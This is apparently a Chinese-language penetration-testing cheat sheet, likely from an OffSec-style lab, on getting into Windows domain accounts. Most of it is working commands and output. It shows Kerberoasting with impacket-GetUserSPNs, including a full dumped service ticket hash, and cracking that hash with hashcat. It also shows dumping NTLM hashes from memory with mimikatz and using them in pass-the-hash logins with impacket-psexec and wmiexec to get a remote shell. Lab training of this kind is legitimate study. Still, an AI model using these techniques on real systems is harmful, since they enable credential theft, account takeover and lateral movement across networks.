【Windows】登入方法
密碼
取得方法:
- 密碼噴灑
- crackmapexe
- hash破解
# impacket-GetUserSPNs => Kerberoasting攻擊 取得hash
# hashcat 破解
sudo impacket-GetUserSPNs -request -dc-ip 192.168.198.70 corp.com/meg
http/files04.corp.com backupuser CN=Domain Admins,CN=Users,DC=corp,DC=com 2023-12-11 10:36:14.564895 <never>
...
[-] CCache file is not found. Skipping...
$krb5tgs$23$*backupuser$CORP.COM$corp.com/backupuser*$096b74a0a8eadb71d68c1d148eeb9dda$4b0294e2de695f87fa4a024eefafc6ef689ef17e2662f3884c68ebc7cb19f15fe2e82264fa4eb1987584b296426d085463faf4bacf97d70e247449159353d5803fbefdf64734bb42e06a1de083ca392fd5325c42bc1ec23f7781c341f143ce5872ee1b6fcb1eda292514b687b7f36fe97b6d8dbb00060264af8efc7a027470fac2bc480a540b4d282d7a6fd92ebb177941170bde251871b162c7cb52423e5a3265e84fdd9354f42754f4969ac790189cd10e3884ed3f7ddef68ea5e1f8339b06d4ff4f504012f9bfc904d4c27bec891141e473c6b1240433233a5dac4943df3440a4761381e705a4f5cb91924e12322c7dd975734f200ab2609edf9996f77b1c2e121578db8e0e217b539badf48cecc15f3a4ce093af2ca2d6b2ec225586166b77d77a4a3885dace734e7b1447ba68e4e62b1c8bfd50364a73a9e7c38c4b665657417cb7df49482bf4c17429b0b0737e13f3da403be9133a2e98d32a9537bed14c146715a34f415e71c28684d8c6afcd022e61daa0d6d1c93e030f7f90043ad84b616ca46a10a883b3a5fa01dc1eb215806a35ba1f5d8f9cfeb3fe5ca1e03d6478127b45d165d9b4a598d9d29c97e33895dcbf3844ca5faa38a4ba4b19b4a268f21a44e6f40bb7fa9e0b1a481f29f42bdd60df61609755b7f1da9c75ff6685005ce2882b9a0b98d0781eca0f560545180f01c63611c57b47bd222721a5465b95823bf2a8da33115ca52bea80004367694e9e23738300e5bb5294da55846ddc1f3ebd3e3d13ec932a1c7fa8b439d3c452d7899c1fae03ae8078a25c2f61ec91bdbefdd08687636bd45497393249470e4b2ec2ac2877bf57648a06ba432fac6a9995bc53dc8e8e5cebd49bfec93bd4f6e5e2c7639f4310c7e0ea348c3cadf7a5b443a52a53957d04d1bdf30370983f21e2306869a7db7abc13df9416df85eb85e71a0669c8cb2d4ee9a9030eac5c421f0108d8ba763f3102e57d5a220f2bda97693cd1493c9f494298d7ca057fe39bc2ee1213990b8b00bbe1f076d852f171a18a7e5c496b963c61e4c63b7197e0e7500afeaf192e6d84f2694e83df5aef914452bbbc5387cefc0ac906d8a1f11258f89a8bd3651bd5a0ed2e2609f22ee825646e422826413030318cb29df4b04a66b50e2f519007e36942049034e30b13c5d96662a846fe56f524066bedadf246ce6a4a3d1453b664a5dbae36bf5b8361b6a7b7540fb8154404f8c677b70c0b89769293aa5915e77efa1c2c0318bf55755a493e32487a7e37b676b661209aa47f85e9e482072cfbaf18485322b475f0
...
hash -> hashes.kerberoast3
...
sudo hashcat -m 13100 hashes.kerberoast3 /usr/share/wordlists/rockyou.txt -r demo.rule --force
NTLM
取得方法:
mimikatz.exe + impacket-psexec
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
...
[00000003] Primary
* Username : maria
* Domain : CORP
* NTLM : 2a944a58d4ffa77137b2c587e6ed7626
...
#impacket-psexec -hashes 00000000000000000000000000000000:{ntlm} {username}@{ip}
impacket-psexec -hashes 00000000000000000000000000000000:2a944a58d4ffa77137b2c587e6ed7626 maria@192.168.198.70
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
NTLM(pth)
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Authentication Id : 0 ; 2421341 (00000000:0024f25d)
Session : RemoteInteractive from 2
User Name : offsec
Domain : CLIENT74
Logon Server : CLIENT74
Logon Time : 2/20/2024 3:50:48 AM
SID : S-1-5-21-4060895957-195960390-4124122524-1001
msv :
[00000003] Primary
* Username : offsec
* Domain : CLIENT74
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
tspkg :
wdigest :
* Username : offsec
* Domain : CLIENT74
* Password : (null)
kerberos :
* Username : offsec
* Domain : CLIENT74
* Password : (null)
/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.72
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
...登入
